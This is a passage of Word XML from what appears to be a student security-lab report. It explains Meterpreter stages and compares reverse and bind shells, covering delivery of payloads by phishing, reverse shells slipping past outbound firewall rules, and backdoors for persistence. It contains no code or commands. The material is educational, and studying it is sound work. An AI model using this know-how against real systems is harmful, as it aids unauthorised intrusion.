    <w:p w14:paraId="1813DDD8" w14:textId="19936697" w:rsidR="00BE326B" w:rsidRPr="005132E4" w:rsidRDefault="00BE326B" w:rsidP="001C68CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:num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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005132E4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The Stage can be thought of as providing</w:t>
      </w:r>
      <w:r w:rsidR="003E38CD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E38CD" w:rsidRPr="005132E4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>connectivity</w:t>
      </w:r>
      <w:r w:rsidR="003E38CD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> at</w:t>
      </w:r>
      <w:r w:rsidRPr="005132E4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> layer</w:t>
      </w:r>
      <w:r w:rsidR="003801F1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="005132E4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5 to 7.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66070C4F" w14:textId="77777777" w:rsidR="00EB6577" w:rsidRDefault="00EB6577" w:rsidP="001C68CE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66355B66" w14:textId="3C7994BF" w:rsidR="00EB6577" w:rsidRPr="006053DB" w:rsidRDefault="006628BB" w:rsidP="001C68CE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Once connected to a </w:t>
      </w:r>
      <w:r w:rsidR="00CE2D4F">
        <w:t>target PC via a stage, for example Meterpreter,</w:t>
      </w:r>
      <w:r w:rsidR="007869B1">
        <w:t xml:space="preserve"> it is </w:t>
      </w:r>
      <w:r w:rsidR="009665D7">
        <w:t>possible</w:t>
      </w:r>
      <w:r w:rsidR="007869B1">
        <w:t xml:space="preserve"> to run </w:t>
      </w:r>
      <w:r w:rsidR="003F1E2E">
        <w:t xml:space="preserve">over </w:t>
      </w:r>
      <w:r w:rsidR="009665D7">
        <w:t>twenty commands</w:t>
      </w:r>
      <w:r w:rsidR="007869B1">
        <w:t xml:space="preserve"> on the target system</w:t>
      </w:r>
      <w:r w:rsidR="003D3338">
        <w:t xml:space="preserve"> as if the attacker were logged into the target PC directly</w:t>
      </w:r>
      <w:r w:rsidR="008B6EB0">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F916D9">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="008B6EB0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CE2D4F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00067FAB">
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidR="0078669E">
        <w:t>ese commands</w:t>
      </w:r>
      <w:r w:rsidR="00067FAB">
        <w:t xml:space="preserve"> allow the </w:t>
      </w:r>
      <w:r w:rsidR="00994CB3">
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="00067FAB">
        <w:t xml:space="preserve">acker to carry out a range of </w:t>
      </w:r>
      <w:r w:rsidR="00994CB3">
        <w:t xml:space="preserve">attacks </w:t>
      </w:r>
      <w:r w:rsidR="00B81962">
        <w:t xml:space="preserve">including uploading, downloading, </w:t>
      </w:r>
      <w:r w:rsidR="00617E74">
        <w:t xml:space="preserve">searching for and </w:t>
      </w:r>
      <w:r w:rsidR="00B81962">
        <w:t>editing files</w:t>
      </w:r>
      <w:r w:rsidR="00FE6814">
        <w:t>, access a command line shell on the target system</w:t>
      </w:r>
      <w:r w:rsidR="00B81962">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CA7D18">
        <w:t>to name but a few available features</w:t>
      </w:r>
      <w:r w:rsidR="00B81962">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC2730A" w14:textId="77777777" w:rsidR="004331D6" w:rsidRDefault="004331D6" w:rsidP="001C68CE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Comparison between </w:t>
      </w:r>
      <w:r w:rsidRPr="00E30DFC">
        <w:t>Reverse Shell and Bind Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5946FFA9" w14:textId="77777777" w:rsidR="00367241" w:rsidRDefault="00367241" w:rsidP="001C68CE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1035F1A1" w14:textId="230CBFFB" w:rsidR="00C57344" w:rsidRDefault="00885C1C" w:rsidP="001C68CE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Both</w:t>
      </w:r>
      <w:r w:rsidR="00367241">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000730E5">
        <w:t xml:space="preserve">reverse and bind shell </w:t>
      </w:r>
      <w:r w:rsidR="00367241">
        <w:t xml:space="preserve">techniques come under the heading of </w:t>
      </w:r>
      <w:r w:rsidR="00FC0257">
        <w:t>client-side</w:t>
      </w:r>
      <w:r w:rsidR="008B65F9">
        <w:t xml:space="preserve"> attacks, where user interaction is required so that the payload is download</w:t>
      </w:r>
      <w:r w:rsidR="00C57344">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="008B65F9">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00C57344">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00134263">
        <w:t xml:space="preserve">The main difference between a </w:t>
      </w:r>
      <w:r w:rsidR="00066099">
        <w:t>reverse</w:t>
      </w:r>
      <w:r w:rsidR="00134263">
        <w:t xml:space="preserve"> and bind shell is simply </w:t>
      </w:r>
      <w:r w:rsidR="00C57344">
        <w:t>which</w:t>
      </w:r>
      <w:r w:rsidR="00134263">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00066099">
        <w:t>device</w:t>
      </w:r>
      <w:r w:rsidR="00C57344">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00066099">
        <w:t xml:space="preserve">initiates the connection. </w:t>
      </w:r>
      <w:r w:rsidR="001A1809">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2B4676" w14:textId="55701BDF" w:rsidR="00D1456E" w:rsidRDefault="001A1809" w:rsidP="001C68CE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">With the reverse shell method, the attacker sends </w:t>
      </w:r>
      <w:r w:rsidR="00EB176C">
        <w:t>the payload to the target using social engineering techniques</w:t>
      </w:r>
      <w:r w:rsidR="00670051">
        <w:t>.  These techniques could include sending</w:t>
      </w:r>
      <w:r w:rsidR="000D673D">
        <w:t xml:space="preserve"> a spam email </w:t>
      </w:r>
      <w:r w:rsidR="00670051">
        <w:t>which</w:t>
      </w:r>
      <w:r w:rsidR="000D673D">
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidR="0056315B">
        <w:t>an</w:t>
      </w:r>
      <w:r w:rsidR="00670051">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0056315B">
        <w:t>unsolicited</w:t>
      </w:r>
      <w:r w:rsidR="000D673D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0056315B">
        <w:t xml:space="preserve">email sent </w:t>
      </w:r>
      <w:r w:rsidR="00885C1C">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="0056315B">
        <w:t xml:space="preserve"> a large group of people.  </w:t>
      </w:r>
      <w:r w:rsidR="00875E0F">
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="000D673D">
        <w:t xml:space="preserve">r </w:t>
      </w:r>
      <w:r w:rsidR="00875E0F">
        <w:t xml:space="preserve">could be a </w:t>
      </w:r>
      <w:r w:rsidR="000D673D">
        <w:t xml:space="preserve">phishing email </w:t>
      </w:r>
      <w:r w:rsidR="00875E0F">
        <w:t xml:space="preserve">that is more tailored to the </w:t>
      </w:r>
      <w:r w:rsidR="00D1456E">
        <w:t>recipient</w:t>
      </w:r>
      <w:r w:rsidR="00D818E4">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00FF3C13">
        <w:t xml:space="preserve"> Another method is by enticing the user to visit a website and download the payload to their PC, which is the method used in the Lab in section </w:t>
      </w:r>
      <w:r w:rsidR="00E00DF7">
        <w:t>7.2 (Carrying out the</w:t>
      </w:r>
      <w:r w:rsidR="00D1456E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E00DF7">
        <w:t>Bin</w:t>
      </w:r>
      <w:r w:rsidR="00D1456E">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00E00DF7">
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r w:rsidR="00D1456E">
        <w:t>attack in a virtual environment).</w:t>
      </w:r>
      <w:r w:rsidR="00D818E4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E86BD65" w14:textId="46E57979" w:rsidR="00BE2D9A" w:rsidRDefault="00D818E4" w:rsidP="001C68CE">
      <w:r>
        <w:t xml:space="preserve">When the user opens the payload on the target machine, this has the affect of </w:t>
      </w:r>
      <w:r w:rsidR="00517387">
        <w:t>initiating a session back to the attackers PC</w:t>
      </w:r>
      <w:r w:rsidR="004D6D18">
        <w:t>.  T</w:t>
      </w:r>
      <w:r w:rsidR="002961DE">
        <w:t>his is illustrated in the diagram below</w:t>
      </w:r>
      <w:r w:rsidR="004D6D18">
        <w:t xml:space="preserve"> whereby the connection is initiated by the target</w:t>
      </w:r>
      <w:r w:rsidR="001C68CE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D6D18">
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidR="002961DE">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002E08D5" w:rsidRPr="002E08D5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4EB1B878" wp14:editId="74784B9C">
            <wp:extent cx="5731510" cy="2678430"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="729914895" name="Picture 4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9914895" name="Picture 4" descr="A computer screen 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78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FEA558" w14:textId="2429A6F0" w:rsidR="002E08D5" w:rsidRPr="002E08D5" w:rsidRDefault="00BE2D9A" w:rsidP="00BE2D9A">
      <w:pPr>
        <w:pStyle w:val="Caption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2" w:name="_Toc150072417"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="009D54B9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>- Reverse Shell - Connection initiated by the Target PC</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="439C2A5D" w14:textId="10C2D4F2" w:rsidR="002961DE" w:rsidRDefault="002961DE" w:rsidP="001C68CE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">With the Bind shell </w:t>
      </w:r>
      <w:r w:rsidR="00882684">
        <w:t>method,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the attacker sends the </w:t>
      </w:r>
      <w:r w:rsidR="00AD2AD4">
        <w:t xml:space="preserve">payload just as </w:t>
      </w:r>
      <w:r w:rsidR="000F5A62">
        <w:t>in the</w:t>
      </w:r>
      <w:r w:rsidR="00AD2AD4">
        <w:t xml:space="preserve"> previous</w:t>
      </w:r>
      <w:r w:rsidR="000F5A62">
        <w:t xml:space="preserve"> example</w:t>
      </w:r>
      <w:r w:rsidR="00AD2AD4">
        <w:t xml:space="preserve">.  The main difference is that the payload now </w:t>
      </w:r>
      <w:r w:rsidR="00923B2E">
        <w:t>opens</w:t>
      </w:r>
      <w:r w:rsidR="00AD2AD4">
        <w:t xml:space="preserve"> the port on the target PC that allows the attacker’s PC to set up a connection</w:t>
      </w:r>
      <w:r w:rsidR="004D6D18">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00982D82">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D6D18">
        <w:t xml:space="preserve"> T</w:t>
      </w:r>
      <w:r w:rsidR="00982D82">
        <w:t>his is illustrated below</w:t>
      </w:r>
      <w:r w:rsidR="00882684">
        <w:t>.  T</w:t>
      </w:r>
      <w:r w:rsidR="004D6D18">
        <w:t xml:space="preserve">his time the connection is </w:t>
      </w:r>
      <w:r w:rsidR="00FC426D">
        <w:t>initiated by the attacker’s PC</w:t>
      </w:r>
      <w:r w:rsidR="00882684">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC426D">
        <w:t xml:space="preserve">after the specified port has been opened by the </w:t>
      </w:r>
      <w:r w:rsidR="00A10102">
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidR="00982D82">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5000992D" w14:textId="77777777" w:rsidR="00BE2D9A" w:rsidRDefault="002E08D5" w:rsidP="00BE2D9A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002E08D5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1424E247" wp14:editId="0AA3F789">
            <wp:extent cx="5731510" cy="2678430"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="293877122" name="Picture 5" descr="A computer screen shot of a red box and blue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877122" name="Picture 5" descr="A computer screen shot of a red box and blue box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78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7A1AE9" w14:textId="6BF78F2C" w:rsidR="008E5C17" w:rsidRPr="00A10102" w:rsidRDefault="00BE2D9A" w:rsidP="00A10102">
      <w:pPr>
        <w:pStyle w:val="Caption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3" w:name="_Toc150072418"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="009D54B9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> - BIND Shell - Connection </w:t>
      </w:r>
      <w:r w:rsidR="009E7121">
        <w:t>initiated</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by the Attack PC</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="57C44722" w14:textId="77777777" w:rsidR="004331D6" w:rsidRDefault="004331D6" w:rsidP="00467048">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Usage of Reverse Shell and Bind Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA08A5D" w14:textId="307F711A" w:rsidR="007516C3" w:rsidRDefault="006D4E23" w:rsidP="00FD1A9B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 Reverse Shell Usage </w:t>
      </w:r>
      <w:r w:rsidR="00FD1A9B">
        <w:t>scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7C3B12" w14:textId="1F9604CF" w:rsidR="00E028E8" w:rsidRDefault="007C5183" w:rsidP="00796962">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The reverse shell method would be </w:t>
      </w:r>
      <w:r w:rsidR="00BB72AD">
        <w:t xml:space="preserve">the most appropriate method of attack in a scenario where the target is behind a firewall.  This is </w:t>
      </w:r>
      <w:r w:rsidR="00642432">
        <w:t>because</w:t>
      </w:r>
      <w:r w:rsidR="00BB72AD">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="006E2DA3">
        <w:t>connection is initiated by the target machine</w:t>
      </w:r>
      <w:r w:rsidR="004060F9">
        <w:t>.  T</w:t>
      </w:r>
      <w:r w:rsidR="00C70BDD">
        <w:t xml:space="preserve">he connection is made outbound </w:t>
      </w:r>
      <w:r w:rsidR="00BB5752">
        <w:t xml:space="preserve">which </w:t>
      </w:r>
      <w:r w:rsidR="00C70BDD">
        <w:t xml:space="preserve">most firewalls would allow </w:t>
      </w:r>
      <w:r w:rsidR="00A140A2">
        <w:t xml:space="preserve">the traffic </w:t>
      </w:r>
      <w:r w:rsidR="00C70BDD">
        <w:t>through</w:t>
      </w:r>
      <w:r w:rsidR="00BF217D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003A7552">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF217D">
        <w:t xml:space="preserve"> O</w:t>
      </w:r>
      <w:r w:rsidR="003A7552">
        <w:t xml:space="preserve">nce the connection </w:t>
      </w:r>
      <w:r w:rsidR="009A7F30">
        <w:t>has been</w:t>
      </w:r>
      <w:r w:rsidR="003A7552">
        <w:t xml:space="preserve"> established </w:t>
      </w:r>
      <w:r w:rsidR="000D2D86">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="003A7552">
        <w:t xml:space="preserve"> the attacker’s PC</w:t>
      </w:r>
      <w:r w:rsidR="00A140A2">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003A7552">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF0C1F">
        <w:t>any incoming traffic will be allowed through</w:t>
      </w:r>
      <w:r w:rsidR="009A7F30">
        <w:t xml:space="preserve"> the firewall </w:t>
      </w:r>
      <w:r w:rsidR="00AF0C1F">
        <w:t>to the target machine</w:t>
      </w:r>
      <w:r w:rsidR="000D2D86">
        <w:t xml:space="preserve"> as the session </w:t>
      </w:r>
      <w:r w:rsidR="00FD3061">
        <w:t>ha</w:t>
      </w:r>
      <w:r w:rsidR="000D2D86">
        <w:t>s opened</w:t>
      </w:r>
      <w:r w:rsidR="006E2DA3">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C10BA2">
        <w:t xml:space="preserve">  This is known as a reflexive outbound </w:t>
      </w:r>
      <w:r w:rsidR="00990014">
        <w:t xml:space="preserve">rule where </w:t>
      </w:r>
      <w:r w:rsidR="00D02EAF">
        <w:t xml:space="preserve">connections originating from within the network are allowed through </w:t>
      </w:r>
      <w:r w:rsidR="00136E26">
        <w:t xml:space="preserve">holding the session open for </w:t>
      </w:r>
      <w:r w:rsidR="002820F2">
        <w:t>inbound network traffic</w:t>
      </w:r>
      <w:r w:rsidR="00EE15F4">
        <w:t>.  T</w:t>
      </w:r>
      <w:r w:rsidR="00F816C0">
        <w:t>his is done</w:t>
      </w:r>
      <w:r w:rsidR="002820F2">
        <w:t xml:space="preserve"> whilst blocking traffic </w:t>
      </w:r>
      <w:r w:rsidR="00EE15F4">
        <w:t xml:space="preserve">originating </w:t>
      </w:r>
      <w:r w:rsidR="00E028E8">
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r w:rsidR="002820F2">
        <w:t xml:space="preserve">outside </w:t>
      </w:r>
      <w:r w:rsidR="00E028E8">
        <w:t>of the network</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-146216270"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="009F3FDA">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="009F3FDA">
            <w:instrText xml:space="preserve"> CITATION Cis14 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="009F3FDA">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00885C1C">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00885C1C" w:rsidRPr="00885C1C">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[7]</w:t>
          </w:r>
          <w:r w:rsidR="009F3FDA">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00E028E8">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AC2E95" w14:textId="04E58DE9" w:rsidR="00E028E8" w:rsidRDefault="00822407" w:rsidP="00796962">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The main drawback to the reverse shell method is that as the connection is initiated by the target PC, </w:t>
      </w:r>
      <w:r w:rsidR="0098567E">
        <w:t>once the connection has dropped</w:t>
      </w:r>
      <w:r w:rsidR="009303CA">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="0098567E">
        <w:t xml:space="preserve"> then it would need to be re-established once again by the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158A1802" w14:textId="7A6C2794" w:rsidR="0098567E" w:rsidRDefault="00C61A33" w:rsidP="00796962">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Presumably once the connection has been established using the reverse shell method, the attacker would first place a back door onto the target system so that they would be able to access the target PC </w:t>
      </w:r>
      <w:r w:rsidR="00381903">
        <w:t>even if the reverse shell session is dropped.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522F998C" w14:textId="2D0817A1" w:rsidR="00A73DD5" w:rsidRDefault="00A73DD5" w:rsidP="00796962">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Another drawback to the reverse shell method is that the attacker</w:t>
      </w:r>
      <w:r w:rsidR="00406136">
        <w:t xml:space="preserve"> must wait for the target to open the payload </w:t>
      </w:r>
      <w:r w:rsidR="00BF3E1F">
        <w:t>and setup the connection.  If the</w:t>
      </w:r>
      <w:r w:rsidR="006A7835">
        <w:t xml:space="preserve"> attacker</w:t>
      </w:r>
      <w:r w:rsidR="00BF3E1F">
        <w:t xml:space="preserve"> miss</w:t>
      </w:r>
      <w:r w:rsidR="006A7835">
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidR="00BF3E1F">
        <w:t xml:space="preserve"> this window of </w:t>
      </w:r>
      <w:r w:rsidR="00FC0257">
        <w:t>opportunity,</w:t>
      </w:r>
      <w:r w:rsidR="00157DC5">
        <w:t xml:space="preserve"> then this connection cannot be made.  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D88946E" w14:textId="77777777" w:rsidR="00381903" w:rsidRDefault="00381903" w:rsidP="007516C3"/>
    <w:p w14:paraId="1FBAE18B" w14:textId="77777777" w:rsidR="002257F1" w:rsidRDefault="002257F1" w:rsidP="007516C3"/>
    <w:p w14:paraId="386D44AD" w14:textId="77777777" w:rsidR="00FC0257" w:rsidRDefault="00FC0257" w:rsidP="007516C3"/>
    <w:p w14:paraId="124D5DDD" w14:textId="77777777" w:rsidR="00A10102" w:rsidRDefault="00A10102" w:rsidP="007516C3"/>
    <w:p w14:paraId="1659C714" w14:textId="34DF1015" w:rsidR="00FD1A9B" w:rsidRDefault="00FD1A9B" w:rsidP="00FD1A9B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5.2 Bind Shell Usage scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62532F3C" w14:textId="77777777" w:rsidR="00381903" w:rsidRDefault="00381903" w:rsidP="007516C3"/>
    <w:p w14:paraId="5A34B1DC" w14:textId="07AE10AE" w:rsidR="004472B1" w:rsidRDefault="000D07EA" w:rsidP="00796962">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The bind shell method</w:t>
      </w:r>
      <w:r w:rsidR="00E65F62">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC0257">
        <w:t>opens</w:t>
      </w:r>
      <w:r w:rsidR="00E65F62">
        <w:t xml:space="preserve"> a specified port on the target PC </w:t>
      </w:r>
      <w:r w:rsidR="00A73DD5">
        <w:t>waiting</w:t>
      </w:r>
      <w:r w:rsidR="00E65F62">
        <w:t xml:space="preserve"> for the attacker</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00997D88">
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>o set up the connection initiated by the attacker’s PC</w:t>
      </w:r>
      <w:r w:rsidR="00A73DD5">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D063CA">
        <w:t xml:space="preserve">  The main benefit of the bind shell method is that </w:t>
      </w:r>
      <w:r w:rsidR="00683277">
        <w:t xml:space="preserve">if the session is dropped then the attacker </w:t>
      </w:r>
      <w:r w:rsidR="00FC0257">
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidR="00683277">
        <w:t xml:space="preserve"> re-establish the connection from the attacker’s PC. </w:t>
      </w:r>
      <w:r w:rsidR="0018544B">
        <w:t>As t</w:t>
      </w:r>
      <w:r w:rsidR="00D1666E">
        <w:t xml:space="preserve">his </w:t>
      </w:r>
      <w:r w:rsidR="0018544B">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00D1666E">
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="0018544B">
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidR="00D1666E">
        <w:t xml:space="preserve"> not require any </w:t>
      </w:r>
      <w:r w:rsidR="00FA5300">
        <w:t>action by</w:t>
      </w:r>
      <w:r w:rsidR="0018544B">
        <w:t xml:space="preserve"> the target</w:t>
      </w:r>
      <w:r w:rsidR="00FA5300">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004472B1">
        <w:t xml:space="preserve">then the attacker will be able to connect multiple times to the target PC.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6957D5" w14:textId="4293EC70" w:rsidR="000D07EA" w:rsidRDefault="004472B1" w:rsidP="00796962">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">During the Lab session, </w:t>
      </w:r>
      <w:r w:rsidR="00C824E7">
        <w:t xml:space="preserve">which was held over two </w:t>
      </w:r>
      <w:r w:rsidR="00D65BC3">
        <w:t xml:space="preserve">successive evenings, </w:t>
      </w:r>
      <w:r w:rsidR="00DE27CA">
        <w:t xml:space="preserve">where the virtual lab PCs were powered off, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">it was noted that </w:t>
      </w:r>
      <w:r w:rsidR="00D65BC3">
        <w:t xml:space="preserve">on </w:t>
      </w:r>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="00D65BC3">
        <w:t xml:space="preserve"> second evening the bind shell payload needed to be deployed a second time</w:t>
      </w:r>
      <w:r w:rsidR="00141050">
        <w:t xml:space="preserve">.  This proves that the </w:t>
      </w:r>
      <w:r w:rsidR="00495973">
        <w:t>bind shell</w:t>
      </w:r>
      <w:r w:rsidR="00141050">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003244B0">
        <w:t xml:space="preserve">exploit would need to be re-ran after a PC has been re-booted, and therefore does not </w:t>
      </w:r>
      <w:r w:rsidR="00495973">
        <w:t>guarantee</w:t>
      </w:r>
